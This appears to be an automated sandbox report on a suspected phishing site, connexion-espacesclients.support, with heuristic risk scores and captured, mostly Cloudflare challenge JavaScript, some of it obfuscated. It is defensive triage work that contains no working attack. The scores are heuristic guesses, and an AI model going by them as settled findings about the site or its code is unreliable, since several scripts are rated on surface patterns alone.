URL: https://connexion-espacesclients.support Model: Joe Sandbox AI | {
"typosquatting": true,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": true,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": true,
"third_party_hosting": true
} |
URL: https://connexion-espacesclients.support |
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "Script contains multiple high-risk indicators: heavily obfuscated data/URLs (encoded strings and tokens), suspicious domain pattern (connexion-espacesclients.support), and complex challenge/verification parameters suggesting potential security bypass or phishing attempt. The extensive use of encoded parameters and suspicious TLD (.support) adds to risk profile."
} |
(function(){window._cf_chl_opt={cvId: '3',cZone: "connexion-espacesclients.support",cType: 'interactive',cRay: '8ec2a17a5e9b4271',cH: 'F7m_a4IJb.ldKgjE6gMJVyrke.F4qAGjM6mn8fY8EEY-1733219199-1.2.1.1-rYbojlDlPOsrT2veLluuRIO9DIfQXFVzaorlK74AaCGdUIZPJe7DwZBXzdQ.vr3V',cUPMDTk: "\/gkm\/?__cf_chl_tk=ikmDfOrsD_3PGWhiFgfOsLgIkMRFnIf6Cg1queg1K08-1733219199-1.0.1.1-pjQs1POxFuUapvCSUYkqFSNZD0TR_nfsaK15qyYdMpE",cFPWv: 'b',cITimeS: '1733219199',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/gkm\/?__cf_chl_f_tk=ikmDfOrsD_3PGWhiFgfOsLgIkMRFnIf6Cg1queg1K08-1733219199-1.0.1.1-pjQs1POxFuUapvCSUYkqFSNZD0TR_nfsaK15qyYdMpE",md: "vEYGBv7peezJ11GKOBdC2gvvDkE.VyiPbLWtYb92Yg8-1733219199-1.2.1.1-q3vygDGGc7sjMkVEeiQOt0UvpRkuX0NPxJqm0INPbFyhYgwRyGFsobmCfitAx0xJ.KGA.pWCWeKcYYWmYpJxCKknHo4W7ED_STXajJo6TeDIRi6ODeDhq.S_0wNmbLP3g4WaLHPY95Hv5k23aIVv1dNGo7muEthLYrg4LuKAI9UfbNZbLfJSgirSArxDbnvBcUWDwYFHbcCQnIUO10SYAwxJ8fZWML9onSWvjc.QQpub_1fTJuhyJJuC4LFSW8FDtzPedzZMJUlujkJcV6djvq31.RVtJvvy29jd.L2muWhe1_lTv0f9vIjRmXHKYceKhbtCGPSwx3BZcbV2D56BmT.kxvCu0xgPajdPgJrjwj500UPa4WV_M1t6_w4ItjcxhVtnhsBin2Xw3lUTQNW0pemuXbWBE7UDsc48lBXLZzpnyu7_6X_GZFQ.RxgUr3zeDv09QaupET2N74ypNJ6cRBimbV81eCtOTu02ewvLU5eBl1CORc4C.zogAVfOo.NnIxKqBCX7bK2cggh_ykncIovPKxPkesKMB2..Gunc15LkcjLfWQM.YJg65Qithz3q_DIZjkgnDNbAcZFtaMabv3uxE4PL_tA41TygoeAyJDanCV4Pm9vGC86rAk4LZQGZMybgnd0AzTWuK2r9XDk6okIrpx_i2NSv4olfNBEXkL3cPf2pJp1dKA__ws9i5Rmy7Wqe1SiuKaVm4QcRy34QlgmrrW6tCr6Z5EH.C5ZExY7YnzmiZDo8OtYx2K1_K6MrMf4ZVxHZ6C3AjaG.92ZMQ2SZUHzWt3X5.dqAv6wMkR.xk.BPKmL2qOTBUfu0WsJdBRkQ9YMTQqBJTRS6NMMYWS2cbfMyyEgysq7hiSZskoYzGKe3ezjlTFAEgsr9nwxs7MTW7fbY4pGOj5J2IGqcNrAubsNdycUFdxdlOzF7xaIa7ptDYi.nQVGjP3gsZeFOI9ZcpvqKc.cdCNY28eahRLouKPV1kkZN8JzPKEhlv5L0QP4GOy99mSLG1PyPXoyivWYjxP5okiZj._9PBC22XGscLCt6g3y3OeG4QslEl17GZ._sjTm4wzu0u6MDMEWaJesKLZo22qrJpHVqcyg2AQEslYXzoWMrPnJkkO.e_FuVwbdfAh_CA9wJxISmyst6a0Mdw7HgI6.DU8PE8ubhXNxefmhAOXGhq5LVss7ESGdm5wGdtJos0xwAiSV2U.FqSDbUnFZq6jAnllxE7Vh6fwggyoXz3PTLOQU.jExgZf7SXU2qy_CWHRE1CUXXS598YT2hxUojh
zEvrYVQxETM0sbomc.DCeT_cBtXCO8z9Rsnl62mLJinubbINLbGF54Pg.AZkuI6GLahCidQ2xFucNedwm7l8M0yPtt5PSg4P5LNSOHU0nykT0uIBMcqzdlABrFPav8nM1NOsZlTWAEebOxHqTLoiTyMJmeuhGVD_RzK2iwL6MVSkw7oJeBPwLV3H9SOejI.jNdAXsgHZNAEBryNbyO_d69BImhCJrBAqtR.FSaG8xW0tk2F4LxPacL1rt2vPJlZECC7YN3uQO6iYi61dZfOG6xyGGAFEitFhm35aR9DNP6hEIQ9t5JWw1vjEhHd.tIKCvo8TBb074lipG5uDIRW9OsafRt6cCp4l34zPxF9gl_3fK89aesKcY6hX6y6_HuYtSmJH.X4dceHkGwkuNwd1XC5lbpzgYGf.o_6zbAS5FUS2AKeqMzRWi3O3oS4DIllsUZZi9qzFPCLEtEokdETsZsDpMWbGjV1HXQ6NLPktwLjpszpo6YucfhbD.RXminoHj2KCXbC0q.s.X56Vaf0.QpeKqWPPd8hw2p.sxidx9isI4Q.BFBc9mJYsvHGnyAjv32rlCS6xtYBIDO.xA39oG1aCznAZnAiW74sOjNAt_2uwB.V02I_VMZe",mdrd: "UJlfFiJyPqLKbC6VfaBV._RuZpHmgA5knDU9GqnmJfk-1733219199-1.2.1.1-NKkPySmn._RVwlzN17vmZg949V5DI0ke4efYAcrqHjTQuU5wSwSskYD4.F1O.SFgRC2R4kPbxPsrgYOAdEgPFBmjT5A0qL9DqfbjoKZ7NUdaGOKwm7y5rvA1GKx1ZE9D08_SqFBxQgSxYRb1FPBkNN9Lnb36Ss1BU04yQhYidr3bvASuP6mzbdId0yCRmlF2Qo2rV6daIC32OpjDsQg0mtpkrk2iFRIsiCz2xCkr0_9ciMcvWOZMQGEyci7457ps3Y54_txTZxbvLl1Bi.Qj1sPhNfnEvztNpJXc4m4_WkboYeGmbMxyNg6RaNWyxuQeQqGakr4nHz8JwrjOiMlCS00QXZSk7Yb2nJDM6RUk4AneQmzYznbXupt.fiBhAc2L0z9Wa0vbiEYiLr_zSrkeR4fzjoPa0X4Vjnwuisx0FFXcPR_5R.IW_jIc7IzUyWPT_uRe4cE5avfpdn.1MOfACcTXC.I_dMrJqo6BTsK.IV_IhDjRaXYpuZIgQrJTqakAx_y2lwjwqUR6h8urTfZ4hIVrP5UBDAwobB2edNMnNHl6K_3hQx7xUgCiu_werOFYuizivg8RgoeYU.e7fQGuNsZ5FgMZfTnSTttWbWcZpxUNvreNPx8tJjf3J36zEr.0sQm6Kp4MOYLYXZR9CLl0YXiMhl5w8YOfF._PiEAozGlPC7ZTbJQEK2.hjjopO7D4.mJvWTVuigUxCb975kq0t8nMUQpfclLVWMlJkuyAYbe6JbkTNdmksnON_14mHXiMnT3YqvwQvJAuleX.1bfUphTnbMwb8QR52C0ILJhDP1j3umjvtKPOppGkovY3t6tV13Ta7xf.NhiGu_1XyMDWwoYubGHJS3epfTpzodHC8tdTpjGDDypm3h8Vo9oADJVSOQ0_nnUobQ3r1m0MTmRffhcIXtsdWkAzWqQ4eG3fjrtXao8CC2XjfZzHtve1AkaUqR2KwlUqQqaX.USZvrdsysoZoYfYwnGeausd0dp2B9vIbcy_0LzQAeQjYVC54_QuwmWoKm7S6_F3GpEezEkn3OF9CNQL6ZvS33HN2ae6lo3XQ0GaBCTUjL29hqEnBG3vSkf0kmEt.E9dtaRPcTEBiprU5PRFDZBBenzDW6rzAnhxzNm8urVSeDW8EFHXFX_oIwy6WzqLM1EfVO1sLBNzZauceZI28UZZqYUsgEDlZ9WjRPZRzD99AhFYENPdo48wJYoVX4GON8AuC6CKMYIzQZlFyZ6Ev1KXGwHEQca.Tt_Ljh48nEhwaO7jF0lxLI9g1uVFevWhx.Bb8vbqo
nmYr |
URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Verifying you are human. This may take a few seconds.",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false
} |
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be legitimate Cloudflare Turnstile/Challenge code. It contains standard challenge verification logic, translations, and interactions with known trusted domain (cloudflare.com). While it uses some DOM manipulation and postMessage communication, these are standard practices for security challenges. The code is partially obfuscated but this is common for anti-bot systems."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"turnstile_footer_privacy":"Privacy","human_button_text":"Verify%20you%20are%20human","turnstile_feedback_description":"Send%20Feedback","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","turnstile_refresh":"Refresh","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_overrun_description":"Stuck%20here%3F","turnstile_verifying":"Verifying...","turnstile_feedback_report":"Having%20trouble%3F","turnstile_footer_terms":"Terms","turnstile_timeout":"Timed%20out","testing_only":"Testing%20only.","turnstile_success":"Success%21","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","tur
nstile_failure":"Error","turnstile_expired":"Expired","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eU,eX,eZ,f0,f1,fd,fp,fv,fw,fx,fH,fS,fW,fX,fY,g2,g3,ga,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1640))/1*(-parseInt(gI(1188))/2)+parseInt(gI(1939))/3*(parseInt(gI(1786))/4)+-parseInt(gI(1784))/5*(-parseInt(gI(1674))/6)+-parseInt(gI(834))/7*(-parseInt(gI(1480))/8)+-parseInt(gI(514))/9*(-parseInt(gI(1089))/10)+-parseInt(gI(1927))/11*(parseInt(gI(812))/12)+-parseInt(gI(616))/13,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,789535),eM=this||self,eN=eM[gJ(601)],eO=function(f,gK,g,h,i,j,k,l,m){for(gK=gJ,g={},g[gK(1610)]=function(n,s){return n+s},g[gK(1906)]=function(n,s){return n%s},g[gK(949)]=function(n,s){return n-s},h=g,m,j=32,l=h[gK(1610)](eM[gK(1593)][gK(1566)]+'_',0),l=l[gK(1549)](/./g,function(n,s,gL){gL=gK,j^=l[gL(818)](s)}),f=eM[gK(438)](f),k=[],i=-1;!isNaN(m=f[gK(818)](++i));k[gK(1002)](String[gK(480)](h[gK(1906)](h[gK(949)](m&255.67,j)-i%65535+65535,255))));return k[gK(701)]('')},eM[gJ(615)]=function(e,gV,g,h,j){h=(gV=gJ,g={},g[gV(1663)]=function(i,j){return j!==i},g);try{if(h[gV(1663)](gV(1437),gV(1437)))j={},j[gV(986)]=gV(1613),j[gV(1058)]=e[gV(1593)][gV(1055)],j[gV(1797)]=gV(1717),j[gV(1739)][gV(1728)](j,'*');else return eR(e)}catch(j){return eP(eQ(e))}},eM[gJ(1208)]=function(gW,d,e,f,g){gW=gJ,d={},d[gW(1084)]=gW(1613),d[gW(1059)]=gW(721),d[gW(951)]=function(h,i){return 
h<<i},e=d,f=1,g=1e3*eM[gW(593)][gW(1252)](e[gW(951)](2,f),32),eM[gW(1587)](function(gX){gX=gW,eM[gX(1739)]&&(eM[gX(1511)][gX(1934)](),eM[gX(1511)][gX(392)](),eM[gX(1936)]=!![],eM[gX(1739)][gX(1728)]({'source':e[gX(1084)],'widgetId':eM[gX(1593)][gX(1055)],'event':gX(863) |
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be a legitimate Cloudflare Turnstile (CAPTCHA/challenge) implementation script. It contains standard error handling, Promise implementations, and type definitions. While it uses some complex code patterns, these are typical for production JavaScript libraries and show no signs of malicious behavior."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return 
o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. 
Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This appears to be legitimate Cloudflare challenge JavaScript configuration code. It contains translations and metadata for Cloudflare's human verification system. While it includes URL parameters and encoded strings (+1), these are standard for Cloudflare's security services. The domain (cloudflare.com) is trusted (-1), and the behavior is consistent with legitimate security verification purposes."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.uaSR=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support"},"translations":{"interactive_running":"Verify%20you%20are%20human%20by%20completing%20the%20action%20below.","challenge_running":"Verifying%20you%20are%20human.%20This%20may%20take%20a%20few%20seconds.","success_title":"Verification%20successful","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","location_mismatch_warning":"Website%20is%20not%20accessible%20via%20this%20address.","redirecting_text_overrun":"%25%7Bplaceholder.com%7D%20is%20taking%20longer%20than%20expected%20to%20reply.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","cookies_missing":"Please%20enable%20Cookies%20and%20reload%20the%20page.","turnstile_feedback_description":"Send%20Feedback","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","footer_text":"Performance%20%26amp%3B%20security%20by%20Cloudflare","time_check_cached_warning_aux":"%3Ca%20class%3D%22refresh_link%22%3ERefresh%20the%20page%3C%2Fa%3E%20to%20try%20again.%20If%20the%20issue%20persists%20attempt%20a%20different%20link%20to%20get%20to%20the%20desired%20page.%20Alternatively%2C%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","interstitial_helper_explainer":"%25%7Bplaceholder.com%7D%20uses%20a%20security%20service%20to%20protect%20against%20malicious%20bots.%20You%20may%20see%20this%20page%20while%20the%20site%20verifies%20you%27re%20not%20a%20bot.","interstitial_helper_title":"What%20is%20this%20Page%3F","stuck_helper_title":"Stuck%20on%20this%20page%3F","turnstile_overrun_description":"Stuck%20he
re%3F","js_cookies_missing":"Enable%20JavaScript%20and%20cookies%20to%20continue%20verification","redirecting_text":"Waiting%20for%20%25%7Bplaceholder.com%7D%20to%20respond...","check_thirdparty":"Please%20unblock%20challenges.cloudflare.com%20to%20proceed.","js_cookies_missing_aux":"%25%7Bplaceholder.com%7D%20needs%20to%20verify%20you%20are%20human%20before%20proceeding.%20Please%20enable%20JavaScript%20and%20cookies%2C%20then%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E.","favicon_alt":"Icon%20for%20%25%7Bplaceholder.com%7D","stuck_helper_explainer":"If%20you%20are%20stuck%20on%20this%20page%2C%20your%20device%20or%20connection%20has%20been%20flagged%20as%20a%20bot.%20Try%20resetting%20your%20device%20or%20internet%20connection%20%28e.g.%20router%29.%20For%20additional%20assistance%2C%20contact%20the%20site%20owners.","browser_not_supported_aux":"%25%7Bplaceholder.com%7D%20needs%20to%20verify%20you%20are%20human%20before%20proceeding.%20Your%20%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%27challenge.supported_browsers%27%3Ebrowser%20is%20unsupported%3C%2Fa%3E%20and%20unable%20to%20complete%20verification.%20Try%20a%20different%20browser%20or%20make%20sure%20your%20browser%20is%20updated%20to%20the%20newest%20version.","location_mismatch_warning_aux":"The%20address%20to%20the%20requested%20website%20has%20changed%20and%20is%20not%20accessible.%20Try%20a%20different%20link%20to%20get%20to%20the%20desired%20page%20or%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","page_title":"Just%20a%20moment...","human_button_text":"Verify%20you%20are%20human","review_connection":"%25%7Bplaceholder.com%7D%20needs%20to%20review%20the%20security%20of%20your%20connection%20before%20proceeding.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3
Ca%2 |
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "This is a legitimate Cloudflare challenge script used for their security verification system. It contains standard postMessage communication between frames, interacts with a known trusted domain (cloudflare.com), and uses typical challenge-response patterns. The code is not obfuscated and follows expected security widget implementation patterns."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: 'sbzvu',
chlApiSitekey: '0x4AAAAAAAAjq6WYeRDKmebM',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: '1/kVL2t161R37ZZrj_',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8ec2a1afce5342c3',
cH: 'LVhVjc2GUjt4KUrrKlatjYuNYy.TpM1D15KyuowzWNQ-1733219207-1.1.1.1-4UB_qUNcxehIoPQBLOj8JKxrES_MTJtecrSl8p3tQFsnsw9KHikWPd3.TBP3alcv',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'light',
wS: 'normal',
md: 'CX5YAAsQhr9517DgTIUq0k_HiOrpxBG21kGCca4vmxE-1733219207-1.1.1.1-x0W0tsI93Ju.rH.tMX0nRZqkjZCQg53nchKlTr3AOPp8E.NMg6E1FAIeqhBYyD9CGgTfL6Otx1B9iCBvhlRMovOnOvI3zfOvucLaT2BjrcLy8jVn8VnFrDxHdU8nwBCtG5V7QKpIxOyGQhhAz5CMtBAxPvaKHjXBpMEi9.aeJqCDvu0ZKmUkj5V0gBSpvSh4YSgrbcxIJFe.4JBFRMOWUateIp45pO2OysDTe0FMhjcxnveBvHk1nflU7yI2qF9IWQLCixaoK280KvdIzlb5TLcrQYWydSGvDmvLVVD3Rx8A_Flszd0_T37n7OKTvTLlRyvGlSc7VKY6xtOagfyHSIbpTeheoP7vVQK8HjZCMkb.sMly5aqkJdFW5IXMqyQW0XSd46kmmmAd0We8s5yzoYMJBJZ0X_oByBmOpYUgIZxF1bZRvIWuZAHkCiEmfiibEvk4_G4T3RPsYImcsAXHUj339Wc1IkoqhC_BXiELSHtx2wskyC1olcH7EbUPgcpfPJ8u3SUfisFTTlPEH6KxB2qc4CsucEG1BbJO9XNWLPi8VSTToLs1oVEmXaVLaGZrHDxZD.tiMq641y6Jl8UHB4wCHIjLWDYB5TXKHVQ0BjViB4v8rbsIY8nIT3lX1gDhjPfJzXCX0ofd_Rm4yTcTh3CIhwAbcK_WlA4jboOGPn9DtCilm4YlR7EUtuOyqbWEd60UUt2mPe5AiHlGFnhyOXFkaqXMfr.hxcDdMs6_RzCjOVNS22Jesp6ZdQESAwUXFdH4JhuG_Qj7vaE.1_Su1bVzyXK7S5KvE6PCYp2wR7fmG2HUa91UymFNr966VF2j7yd02ZIGfVs3VJBTwAe3aAN2S0_FwZKP_MpOQWSWD.a5FtRQuGBxK07H7IY5KH8zFZLuZD3B4Ugz6tvGJYimJj.rlluG2IdMSXfYRDxjD2CaMDp.qsE8zyu39hrQB0YrTgjK1MQKnviD6e.cDNIeiALQizPsQbuZWXBQreOmlgjfMXiZKPKLCV2B2CujACh9JvxSdieSFtAqF1FEiznYlhp_vzVo6impqQTr2gTTNd584W3OYpsWt7.LvsVkrq1vcumnx73s61YdrslohwzDlLOFFz4Kqi2mEUS7pkDNx6W0GwsLUIftoSl6NaQdO.7E9QT2Lb3DemsrHeAnEWBlt2Yty5Z9o0ESQK2EPfKa1BC0wyqBFzf4CCCBCbQ7bcvNwhLIHcQ32_unWVFJunLa.F6mVWAZStqFKQsmJup2IrVnieTEAtIvFuQ2zAUuuM5U6i9qqRecgVox4W.pqxajxoQ8qWJTgjogHBwMY9ameg.KdidBgzs8qKzEIIYDR_ewPzdEjagTMiqXOz5BQ59ngQ',
cITimeS: '1733219207',
// refresh(): asks the embedding page to reload this challenge widget.
// Posts a 'reloadRequest' message to window.parent, if one is set. The
// widgetId and nextRcV literals repeat the chlApiWidgetId and chlApiRcV
// values set earlier in this same object.
// NOTE(review): the target origin is "*", so the message goes to whatever
// page embeds this frame. The payload visible here holds only the widget id
// and the rcV value.
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: 'sbzvu',
nextRcV: '1/kVL2t161R37ZZrj_',
event: 'reloadRequest',
}, "*");
}
}
};
// Message handler for the challenge frame. It answers a 'meow' message
// addressed to this widget with a 'food' message carrying the same seq
// value. This looks like a liveness ping/pong with the parent page; confirm
// against the parent-side script, which is not part of this capture.
// NOTE(review): only fields of event.data are checked (source, event,
// widgetId). event.origin and event.source are never inspected, and the reply
// is posted to window.parent with target origin '*'.
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
// Registered for every 'message' event delivered to this window.
window.addEventListener('message', handler);
}());
|
URL: https://connexion-espacesclients.support/gkm/ Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "Script appears to be Cloudflare's DDoS protection challenge script but uses potentially risky practices: creates hidden iframe (+2), injects dynamic script content (+2). However, it's from a legitimate security service (-1) and serves a valid protection purpose. Main concern is the dynamic script injection pattern, though it's a known Cloudflare implementation."
} |
// Hidden-iframe script loader (minified, kept exactly as captured).
// If document.body exists, it appends a 1x1, absolutely positioned iframe with
// visibility 'hidden'. Once the document is no longer 'loading', c() runs.
// c() writes an inline <script> into the iframe's <head>. That inline script
// sets window.__CF$cv$params and loads
// '/cdn-cgi/challenge-platform/scripts/jsd/main.js'. The path is relative, so
// it resolves against the host serving this page.
// The `t` parameter is Base64 for "1733219228.000000", which looks like a Unix
// timestamp. `r` is an opaque 16-hex-digit id.
// NOTE(review): the inline script is a fixed string literal. No page or user
// input is concatenated into innerHTML in the code shown.
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ec2a22cfd83443e',t:'MTczMzIxOTIyOC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
URL: JavaScript Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "High-risk script with multiple red flags: uses eval() with base64 encoded content (+3), contains obfuscated code (+3), performs aggressive DOM manipulation with form submission (+2). The script also includes bot detection logic and automatic form submission/page reloads, which could be used maliciously. The use of XMLHttpRequest to an internal endpoint '/gkm/' with encoded headers adds suspicion."
} |
